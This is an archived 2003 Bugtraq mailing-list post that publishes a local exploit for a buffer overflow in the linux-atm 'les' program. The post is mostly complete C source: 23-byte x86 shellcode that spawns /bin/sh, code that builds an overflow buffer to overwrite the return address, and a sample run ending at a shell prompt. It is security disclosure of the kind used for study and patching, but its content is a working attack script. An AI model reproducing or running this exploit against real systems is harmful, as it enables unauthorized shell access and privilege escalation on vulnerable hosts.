ATM on linux Exploit(les,local)

From: axis ph4nt0m (axis_at_ph4nt0m.net)
Date: 05/25/03

  • Next message: 3APA3A: "Re: uml_net bug" 
    Date: 25 May 2003 05:19:32 -0000
To: bugtraq@securityfocus.com
    ('binary' encoding is not supported, stored as-is)

    /* ATM on linux Exploit
    *** vulnerability discovered by Angelo Rosiello
    *** sorry for my poor english.
    *** i wrote this exploit just for fun.
    *** i can't get a rootshell on my linux :(
    *** tested on redhat7.3 ,other linux maybe OK,too.
    *** atm package:linux-atm-2.4.0-1.i386.rpm
    *** http://sourceforge.net/projects/linux-atm
    ***
    *** Here is another exploit by Angelo Rosiello
    *** But i can't get shell with this code
    *** http://www.securiteam.com/exploits/5EP0M1P9PO.html
    ***************************************************

       Buffer is 244 bytes
       using 244+4 bytes to overwrite eip.

    ***************************************************
    *** AUTOR:@Xis2(ph4nt0m)
    *** CONTACT:axis@ph4nt0m.net
    *** COPYRIGHT (c) 2003 PH4NT0M SECURITY
    *** http://www.ph4nt0m.net
    *** 2003.5.15
    ***************************************************

    [tt@PH4NT0M explab]$ gcc -o linux_atm myatm.c
    [tt@PH4NT0M explab]$ ./linux_atm
    ****************************************

    linux-atm exploit!

    Coded by @Xis2(ph4nt0m)
    Welcome to http://www.ph4nt0m.net

    Jump to 0xbffffa5c
    ****************************************

    DEBUG: Log opened
    NOTE: Configuration file:
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAA??
    sh-2.05a$

    ***************************************************

    */

    #include<stdio.h>
    #include<stdlib.h>
    #include<unistd.h>

    #define BSIZE 244

    /* linux x86 shellcode by bob from dtors.net,23 bytes */
    char shellcode[]="\x31\xc0\x50\x68\x6e\x2f\x73\x68"
    "\x68\x2f\x2f\x62\x69\x89\xe3\x50"
    "\x53\x89\xe1\xb0\x0b\xcd\x80";

    int main(int argc,char *argv[]){
        char buf[BSIZE+10];
        char *prog[]={"/usr/local/sbin/les","-f",buf,NULL};
        char *env[]={"HOME=/root",shellcode,NULL};
        unsigned long ret;

        printf("****************************************\n\n");
        printf("Linux-atm exploit!\n\n");
        printf("Coded by @Xis2(ph4nt0m)\n");
        printf("Welcome to http://www.ph4nt0m.net\n\n");
        printf("Jump to 0x%08x\n",&ret);
        printf("****************************************\n\n\n");

    /* calculate the shellcode address */
        ret=0xc0000000-sizeof(void *)-strlen(prog[0])-strlen(shellcode)-0x02;

    /* construct our evil buffer */
        memset(buf,0x41,sizeof(buf));
        memcpy(buf+BSIZE+4,(char *)&ret,4);
        buf[BSIZE+8]=0x00;

        execve(prog[0],prog,env);

        return 0;
    }

  • Next message: 3APA3A: "Re: uml_net bug"